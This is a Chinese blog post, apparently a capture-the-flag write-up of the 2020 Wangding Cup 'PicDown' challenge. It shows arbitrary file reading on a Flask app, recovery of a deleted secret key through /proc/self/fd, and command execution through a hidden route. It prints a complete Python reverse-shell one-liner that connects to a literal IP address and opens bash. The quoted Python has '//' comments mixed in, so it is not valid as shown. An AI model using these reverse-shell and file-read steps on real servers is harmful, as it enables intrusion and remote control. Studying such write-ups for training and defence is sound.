[网鼎杯 2020 白虎组]PicDown(任意文件读取)

最新推荐文章于 2024-06-05 02:26:20 发布
最新推荐文章于 2024-06-05 02:26:20 发布
阅读量441 收藏
点赞数
分类专栏: rce命令执行 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128455370
版权

 

打开界面发现有一个get传参然后,尝试任意文件读取漏洞,/etc/passwd看一下,提示下载了一个jpg图片然后

打不开只能用 010查看一下信息

 看来是猜对了,然后

 如果日记没删掉可以查看历史记录  .bash_history呃呃呃差不到,那就看一下现在的进程

读取当前进程执行命令/proc/self/cmdline

python 2的app.py文件,直接读取

 

源码出来了,解析一下

 


from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"  //锁定文件目录
f = open(SECRET_FILE)  //直接打开文件
SECRET_KEY = f.read().strip() //读取
os.remove(SECRET_FILE)//然后删除文件
//注意这里没关闭文件就删除了


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')  //这个路由下
def manager():
    key = request.args.get("key")//get传参
    print(SECRET_KEY)//输出,但显示不出来
    if key == SECRET_KEY://看看是否相等
        shell = request.args.get("shell")
        os.system(shell)//传参shell
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

@app.route('/no_one_know_the_manager')  //这个路由下
def manager():
    key = request.args.get("key")//get传参
    print(SECRET_KEY)//输出,但显示不出来
    if key == SECRET_KEY://看看是否相等
        shell = request.args.get("shell")
        os.system(shell)//传参shell
        res = "ok"
    else:
        res = "Wrong Key!"

    return res

这一块可以分析一下,我们需要获得SECRET_KEY的值,然后使key等于,最后shell进行命令执行,但是看完以后那个文件被删除了,我们怎么获得呢?

此处可以通过../../../proc/self/fd/读取,这个目录包含了进程打开的每一个文件的链接

后面这个3怎么来的呢,是自己一个个试的,也可以爆破出来 

wLhTILlcJLljdKT/aHZn6BpfPLIqiC0a9udqLjaQRzA=

然后我们shell传一个python反弹shell的就可以

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('111.1.99.145',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

传的时候需要进行url编码

 端口监听,然后切换目录找flag.

 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020网鼎杯白虎赛题.zip
05-15
比赛试题附件,其中包括misc,re,crypto,pwn,web只有题目,没有环境,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
[网鼎杯 2020 白虎]PicDown
Sk1y的博客
09-16 390
读取源码,反弹shell
网鼎杯 白虎.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
网页图片批量下载精灵v1.6特别版
07-28
图片批量下载精灵是一款从网站上下载图片的共享软件,它可以把网站上的图片都下载下来... 使用方法 安装原版,解压缩附件(PicDown-patch.rar)到目录下,用附件运行程序即可(即以后直接运行PicDown-patch.exe就可以了)~
/proc/self/目录的意义
热门推荐
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
[网鼎杯 2020 白虎]PicDown --proc文件的利用--python反弹shell
unexpectedthing的博客
11-15 894
文章目录前言wp参考 前言 这个题跟到wp做的,确实思路很像一个渗透过程了,值得好好学习。 wp 首先打开环境,F12,dirsearch和御剑都没有扫描出什么东西。然后输入一个输入框,填入抓包 有个url的GET参数,我们尝试SSRF url=file://127.0.0.1/flag.php或者php伪协议,都没有什么反应。然后尝试目录穿越 ?url=../../etc/passwd 说明存在文件包含,目录穿越可以实现 我们知道/proc文件系统,所以我们使用目录穿越爆出文件目录 ?url=../
-----已搬运-------BUUCTF: [网鼎杯 2020 白虎]PicDown --- proc文件的利用, --- python反弹shell ---- python代码审计
Zero_Adam的博客
03-17 1156
参考自:whoami大佬的 一、自己做: 我自己做的时候,没有想找个文件目录穿越,用那些伪协议,来了个便,然后127.0.0.1的ssrf也尝试 这些都是些啥啊!!! /proc/self/environ /proc/self/cmdline 二、学到的&&不足: 当看到url中有?file= ... 的时候,当然是想到文件包含balabala之类的。同时还可能用PHP伪协议,php://filter啦,或者本地的直接file://,找个file还可以加空格绕过过滤哦,之前有个题做过的,
[网鼎杯 2020 白虎]PicDown(精讲)
记录学习,一起进步
03-24 692
[网鼎杯 2020 白虎]PicDown(精讲)
python-flask项目的服务器线上部署
最新发布
weixin_74314406的博客
06-05 715
Flask 项目中,打包通常不是指将代码本身打包成一个可执行文件(因为 Flask 是一个 WSGI 应用,它通常运行在 Web 服务器和 WSGI 容器如 Gunicorn、uWSGI 等之上),而是指准备项目的所有必要文件和依赖,以便在其他环境(如生产服务器)上部署。如果你的 Flask 项目使用了如 Flask-Assets 这样的库来处理静态文件(如 CSS 和 JavaScript),你可能需要运行一个命令来收集这些文件到一个目录中,以便在生产环境中服务。这可以帮助您诊断任何潜在的问题。
Python Flask是什么:深入解析与实用指南
ntdllent_tyaaq的博客
06-01 456
总的来说,Python Flask是一个强大而灵活的Web框架,它提供了基本的Web开发功能,并通过丰富的扩展库和集成能力支持复杂应用的开发。尽管它可能对于初学者来说具有一定的学习曲线,但一旦掌握了其核心概念和工作流程,你将能够利用Flask构建出高效、稳定且易于维护的Web应用。Flask的核心非常简洁,只包含基本的路由、模板和上下文管理等功能,这使得它成为快速构建小型到中型Web应用的理想选择。在当今的Web开发领域中,Flask作为一个轻量级的Python Web框架,逐渐受到广大开发者的青睐。
Python flask怎么连接MySQL?
琳琳的博客
05-29 557
使用Django ORM时,你需要遵循Django的项目和应用结构,并在应用的`models.py`文件中定义模型。在Python中连接MySQL并使用模型创建新的表,通常我们会使用ORM(对象关系映射)库,比如SQLAlchemy或者Django ORM,它们允许我们定义Python类来映射到数据库中的表,并通过这些类进行数据库操作。请确保将`username`、`password`、`localhost`、`3306`和`dbname`替换为你自己的MySQL数据库的实际凭证和设置。
基于python flask +pyecharts实现的气象数据可视化分析大屏
weixin_49081159的博客
05-28 832
气象数据可视化分析大屏基于Python Flask和Pyecharts技术,旨在通过图表展示气象数据的分析结果,提供直观的数据展示和分析功能。在当今信息化时代,气象数据的准确性和实时性对各行业具有重要意义。通过搭建气象数据可视化分析大屏,用户可以实时监测和分析气象数据趋势,帮助决策者制定有效的应对措施。该系统将为气象领域的研究人员、气象服务机构和相关行业提供强大的数据分析和决策支持,推动气象信息化应用的发展和提升。
[网鼎杯 2020 白虎]picdown
03-16
picdown 是一个图片下载工具,可以通过输入图片链接,将图片下载到本地。它可以支持多线程下载,提高下载速度。同时,它还可以对下载的图片进行重命名和分类保存。这个工具在网站开发和图片爬虫方面都有很大的用处。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值